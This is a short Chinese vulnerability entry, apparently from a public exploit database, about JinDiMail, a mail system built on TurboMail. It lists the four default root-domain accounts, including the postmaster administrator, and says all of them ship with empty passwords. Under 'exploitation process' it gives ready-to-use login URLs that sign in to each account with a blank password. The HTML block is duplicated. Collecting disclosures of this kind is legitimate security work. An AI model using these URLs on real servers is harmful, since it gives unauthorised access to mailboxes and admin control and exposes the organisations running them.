VULHUB ™

<p>JinDiMail邮箱系统是TurboMail基础上二次开发</p><p>安装后&nbsp;默认会有4个root域的账号，管理员及三个普通账号：</p><p>postmaster管理员</p><p>nobody</p><p>sec_bm</p><p>sec_sj</p><p>默认密码为空</p><p><br></p><p>漏洞利用过程</p><p><br></p><p><a href="http://xxx.com/mailmain?type=login&amp;uid=sec_bm&amp;pwd=&amp;domain=root&amp;style=enterprise">http://xxx.com/mailmain?type=login&amp;uid=sec_bm&amp;pwd=&amp;domain=root&amp;style=enterprise</a></p><p><a href="http://xxx.com/mailmain?type=login&amp;uid=" rel="nofollow">http://xxx.com/mailmain?type=login&amp;uid=</a> postmaster&amp;pwd=&amp;domain=root&amp;style=enterprise</p><p><a href="http://xxx.com/mailmain?type=login&amp;uid=" rel="nofollow">http://xxx.com/mailmain?type=login&amp;uid=</a> nobody&amp;pwd=&amp;domain=root&amp;style=enterprise</p><p>&nbsp;</p><p><a href="http://xxx.com/mailmain?type=login&amp;uid=" rel="nofollow">http://xxx.com/mailmain?type=login&amp;uid=</a> sec_sj&amp;pwd=&amp;domain=root&amp;style=enterprise</p><p><img alt="1.png"...

<p>JinDiMail邮箱系统是TurboMail基础上二次开发</p><p>安装后&nbsp;默认会有4个root域的账号，管理员及三个普通账号：</p><p>postmaster管理员</p><p>nobody</p><p>sec_bm</p><p>sec_sj</p><p>默认密码为空</p><p><br></p><p>漏洞利用过程</p><p><br></p><p><a href="http://xxx.com/mailmain?type=login&amp;uid=sec_bm&amp;pwd=&amp;domain=root&amp;style=enterprise">http://xxx.com/mailmain?type=login&amp;uid=sec_bm&amp;pwd=&amp;domain=root&amp;style=enterprise</a></p><p><a href="http://xxx.com/mailmain?type=login&amp;uid=" rel="nofollow">http://xxx.com/mailmain?type=login&amp;uid=</a> postmaster&amp;pwd=&amp;domain=root&amp;style=enterprise</p><p><a href="http://xxx.com/mailmain?type=login&amp;uid=" rel="nofollow">http://xxx.com/mailmain?type=login&amp;uid=</a> nobody&amp;pwd=&amp;domain=root&amp;style=enterprise</p><p>&nbsp;</p><p><a href="http://xxx.com/mailmain?type=login&amp;uid=" rel="nofollow">http://xxx.com/mailmain?type=login&amp;uid=</a> sec_sj&amp;pwd=&amp;domain=root&amp;style=enterprise</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434694272832-1.png" data-image-size="865,331"><br></p>